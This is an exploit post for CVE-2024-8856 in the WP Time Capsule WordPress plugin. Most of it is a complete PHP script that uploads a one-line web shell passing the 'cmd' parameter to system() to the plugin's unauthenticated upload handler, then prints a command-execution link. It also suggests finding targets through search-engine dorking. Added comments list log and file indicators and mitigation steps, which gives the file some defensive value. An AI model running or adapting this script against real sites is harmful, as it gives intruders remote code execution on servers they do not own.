=============================================================================================================================================
| # Title : WP Time Capsule 1.22.21 PHP Shell Upload vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://fr.wordpress.org/plugins/wp-time-capsule/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: exploits an arbitrary file upload vulnerability in WordPress WP Time Capsule plugin versions less than or equal to 1.22.21.

    (Related : https://packetstorm.news/files/id/183146/ Related CVE numbers: CVE-2024-8856 ) .

[+] Payload :

[+] Set Target : line 17

[+] Usage : php poc.php

[+] PayLoad :

<?php
// Overview: builds one multipart/form-data POST carrying a .php file, sends it to the
// upload handler bundled with the plugin, and reports success if the response body
// contains the uploaded file name.
//
// What the request shows about the flaw:
//   - No cookie, nonce or credential is set on the cURL handle below, so the handler
//     is reached without any authentication.
//   - The uploaded file keeps its .php extension; the script depends on the handler
//     accepting it as-is.
//   - The script assumes the stored file is served, and executed as PHP, from the same
//     upload/php/ directory as the handler.
//
// Detection and mitigation notes for site owners:
//   - Web logs: POST requests to .../wp-tcapsule-bridge/upload/php/index.php, and GET
//     requests to .php files in that directory carrying a cmd= query parameter.
//   - File system: unexpected .php files under wp-tcapsule-bridge/upload/php/.
//   - Run a plugin release newer than 1.22.21 (the last affected version per the header
//     above) and deny direct web access to, and PHP execution in, plugin upload directories.

// Upload-handler URL inside the plugin; this is the value the "Set Target" note in the
// header refers to. victim.com is the host as written on the page.
$target = "http://victim.com/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php";
// File name is a two-digit number plus ".php" (10.php .. 99.php), so only 90 names are possible.
$payload_name = rand(10,99) . ".php";
// One-line web shell: passes the cmd query parameter straight to system().
// A file with this content on a server is an indicator of compromise.
$payload_content = "<?php system(\$_GET['cmd']); ?>";

// Hand-built multipart body with a single part in the form field "files".
// The boundary is a browser-style prefix followed by a 32-character hex MD5 of the
// current time. NOTE(review): that suffix likely differs from a browser-generated
// boundary; verify before relying on it as a signature.
$boundary = "----WebKitFormBoundary" . md5(time());
$eol = "\r\n";
$data = "--" . $boundary . $eol;
$data .= 'Content-Disposition: form-data; name="files"; filename="' . $payload_name . '"' . $eol;
$data .= "Content-Type: application/x-php" . $eol . $eol;
$data .= $payload_content . $eol;
$data .= "--" . $boundary . "--" . $eol;

// Send the request. Only URL, method, body, Content-Type and return-as-string are set;
// there is no timeout and no error check on the handle.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_HTTPHEADER, array("Content-Type: multipart/form-data; boundary=" . $boundary));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch); // false on transport failure, which ends up in the else branch below
curl_close($ch);

// Report the result. Success is inferred only from the file name appearing in the
// response body; the uploaded file itself is never requested to confirm it.
// The message strings are mis-encoded Arabic and are left exactly as found. They appear
// to read "payload uploaded successfully", "execution link" and "failed to upload the payload".
if (strpos($response, $payload_name) !== false) {
    echo "[+] تم Ø±ÙØ¹ الØÙ…ولة بنجاØ: " . $payload_name . "\n";
    echo "[+] رابط التنÙيذ: http://victim.com/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/$payload_name?cmd=whoami\n";
} else {
    echo "[-] ÙØ´Ù„ ÙÙŠ Ø±ÙØ¹ الØÙ…ولة.\n";
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================